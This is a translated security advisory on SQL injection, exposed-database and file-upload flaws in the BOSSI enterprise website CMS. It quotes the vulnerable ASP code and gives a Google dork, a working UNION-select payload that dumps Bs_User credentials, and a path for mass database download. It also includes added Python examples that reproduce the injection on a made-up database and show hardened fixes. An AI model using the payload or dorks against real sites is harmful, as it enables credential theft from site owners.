BOSSI enterprise website management system: SQL injection and file upload vulnerabilities - vulnerability advisory - Black Bar Safety Net

2011-06-14T00:00:00
ID MYHACK58:62201130865
Type myhack58
Reporter Anonymous (佚名)
Modified 2011-06-14T00:00:00

Description

BOSSI enterprise website management system, Chinese/English bilingual edition. In the back end, the Chinese and English content of an item are added and edited on the same page. The site's left column is built from modules that can be added and removed freely without touching any code, so someone who cannot write a web page can still run their own company site. Basic information such as the site title, address, copyright notice, company e-mail and similar details is maintained under "company information" in the back end.

---------------------------------------------------- Vulnerability one: SQL injection

Vulnerable page: NewsInfo.asp

Vulnerable code:

<%
if not isEmpty(request.QueryString("id")) then
    id = request.QueryString("id")
else
    id = 1
end if

Set rs = Server.CreateObject("ADODB.Recordset")
rs.Open "Select * From Conews where id=" & id, conn, 3, 3
' Record the number of visits
rs("counter") = rs("counter") + 1
rs.update
nCounter = rs("counter")
%>

The id variable goes straight from the query string into the SQL statement with no validation or type check, so it is injectable; the Ah-D injection tool handles it directly.

Page two: yeNewsInfo.asp

Vulnerable code:

<%
if not isEmpty(request.QueryString("id")) then
    id = request.QueryString("id")
else
    id = 1
end if

Set rs = Server.CreateObject("ADODB.Recordset")
rs.Open "Select * From Yenews where id=" & id, conn, 3, 3
' Record the number of visits
rs("counter") = rs("counter") + 1
rs.update
nCounter = rs("counter")
' Define the content
content = ubbcode(rs("content"))
%>

Same principle as above; injectable in the same way.

Vulnerability two: database download

Database path: Database/DataShop.mdb

The Access file sits under the web root at its default path with nothing stopping a direct request, so anyone can download the whole database (including the Bs_User table with the account credentials). To check, request the path directly; a 200 response with an .mdb body confirms it.

Vulnerability three: file upload

Vulnerable pages: upfile.asp, upfilea.asp

Problem code:

fileExt = lcase(file.FileExt)
Forumupload = split(UpFileType, "|")
for i = 0 to ubound(Forumupload)
    if fileExt = trim(Forumupload(i)) then
        EnableUpload = true
        exit for
    end if
next
if fileExt = "asp" or fileExt = "asa" or fileExt = "aspx" then
    EnableUpload = false
end if
if EnableUpload = false then
    msg = "This file type is not allowed to be uploaded!\n\nOnly these file types may be uploaded: " & UpFileType
    founderr = true
end if

This is the same upload code that has the known vulnerabilities in Liangjing (良精); who copied whom is anyone's guess. The only server-side types it vetoes are asp, asa and aspx; whatever else the configured UpFileType lists goes through. A registered user can upload a PHP webshell from a locally saved copy of the form, or get an ASP webshell past the filter by adding a space. I won't repeat the specific method here; it is described in the analysis of the Liangjing enterprise website management program.
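To make the shape of the check concrete, here is an added example (not code from the advisory or from the BOSSI product): the upfile.asp extension check above ported line for line to Python, next to an allow-list-only replacement that derives and normalises the extension itself and never stores the client-supplied file name. The UpFileType strings, file names and the image allow-list are constructed test input.

```python
# Added example, not the product's code. Port of the upfile.asp check from the
# advisory beside a hardened version. All inputs below are constructed.
import uuid

# The only extensions the original code vetoes after the whitelist pass.
ASP_EXTS = ("asp", "asa", "aspx")


def original_check(file_ext, up_file_type):
    """Port of the VBScript: accept if the extension appears in UpFileType,
    then veto only the three hard-coded ASP extensions. Anything else the
    configured list happens to contain (php, for instance) is accepted."""
    file_ext = file_ext.lower()
    enable_upload = False
    for allowed in up_file_type.split("|"):
        if file_ext == allowed.strip():
            enable_upload = True
            break
    if file_ext in ASP_EXTS:
        enable_upload = False
    return enable_upload


# Assumed allow-list for an image upload endpoint (not on the page).
IMAGE_EXTS = frozenset({"gif", "jpg", "jpeg", "png"})


def hardened_ext(filename, allowed=IMAGE_EXTS):
    """Derive the extension from the raw file name ourselves and accept it
    only if it is on a fixed allow-list. Returns the extension or None."""
    # NTFS silently drops trailing spaces and dots when a file is written,
    # so strip them before looking at the extension, not after.
    name = filename.rstrip(" .")
    if "." not in name:
        return None
    ext = name.rsplit(".", 1)[1].lower()
    return ext if ext in allowed else None


def stored_name(filename):
    """Name the file ourselves: random stem plus the vetted extension, so no
    part of the client-supplied name (extra dots, separators) reaches disk."""
    ext = hardened_ext(filename)
    if ext is None:
        raise ValueError("file type not allowed: %r" % filename)
    return "%s.%s" % (uuid.uuid4().hex, ext)


if __name__ == "__main__":
    print(original_check("php", "gif|jpg|php"))  # True: only asp/asa/aspx are vetoed
    print(original_check("asp", "gif|jpg|asp"))  # False
    print(hardened_ext("shell.php"))             # None
    print(stored_name("photo.JPG"))              # 32 hex characters followed by .jpg
```

The design point is that the original check's blacklist is the only thing standing between a configured UpFileType and the web server's script handlers, whereas the hardened version treats the allow-list as the sole decision and throws away the client's file name entirely, so tricks that play on how the name is parsed on disk have nothing to work with.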

Exploitation. Injection: Google for inurl:yeNewsInfo.asp?id

Injection payload: %20and%201=2%20union%20select%201,username,3,4,password%20from%20Bs_User


Or use Ah-D; the table name Bs_User has to be added by hand.
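To show what the yeNewsInfo.asp query and the union payload above actually do together, here is an added example that is not part of the advisory or the BOSSI product. It rebuilds the page's string-concatenated query in Python over an in-memory SQLite database, runs the advisory's payload against it, and then shows the bound-parameter form that rejects it. The column layouts of Yenews and Bs_User, the sample rows, and the assumption that the page displays the second and fifth columns of the fetched row are all constructed for the example; SQLite accepts the same UNION shape as the Jet engine behind the .mdb, so the mechanics carry over.

```python
# Added example, not code from the advisory or from BOSSI. Reconstructs the
# yeNewsInfo.asp query in Python over SQLite and runs the union payload.
# Schema and data below are constructed; column layouts are assumptions.
import sqlite3
from urllib.parse import unquote

SCHEMA = """
CREATE TABLE Yenews (id INTEGER, title TEXT, addtime TEXT, counter INTEGER, content TEXT);
CREATE TABLE Bs_User (username TEXT, password TEXT);
INSERT INTO Yenews VALUES (1, 'Welcome', '2011-06-14', 0, 'Hello');
INSERT INTO Bs_User VALUES ('admin', '21232f297a57a5a743894a0e4a801fc3');
"""

# The payload from the advisory, exactly as it would follow ?id=1 in the URL.
PAYLOAD = "%20and%201=2%20union%20select%201,username,3,4,password%20from%20Bs_User"


def fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_query(conn, id_param):
    """Mirror of rs.Open "Select * From Yenews where id=" & id (the counter
    update that follows in the ASP is left out; it does not affect the read)."""
    sql = "Select * From Yenews where id=" + id_param
    return conn.execute(sql).fetchall()


def safe_query(conn, id_param):
    """Hardened form: id must be an integer and is bound, never concatenated."""
    if not id_param.isdigit():
        raise ValueError("id must be numeric")
    return conn.execute("Select * From Yenews where id=?", (int(id_param),)).fetchall()


def render(row):
    # Assumption: the page prints the title (column 2) and content (column 5),
    # which is why the payload puts username and password in those positions.
    return (row[1], row[4])


def run_injection():
    """What the attacker sees: the Bs_User row rendered in place of the news item."""
    conn = fresh_db()
    rows = vulnerable_query(conn, "1" + unquote(PAYLOAD))
    return [render(r) for r in rows]


def run_hardened():
    """Same request against the bound-parameter version: rejected before any SQL runs."""
    conn = fresh_db()
    try:
        return safe_query(conn, "1" + unquote(PAYLOAD))
    except ValueError:
        return "rejected"


if __name__ == "__main__":
    print(run_injection())   # [('admin', '21232f297a57a5a743894a0e4a801fc3')]
    print(run_hardened())    # rejected
```

The `and 1=2` clause empties the legitimate result so the single UNION row is what the page renders; the two filler columns and the literal 1 only exist to match the five-column width of Yenews, which is why Ah-D needs the table name supplied by hand but finds the column count on its own.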


Database download:

Excavator (dork scanner) keyword: inurl:yeNewsInfo.asp?id

Suffix: Database/DataShop.mdb


I am not demonstrating the upload exploit here; refer to the analysis of the Liangjing enterprise website management system vulnerabilities.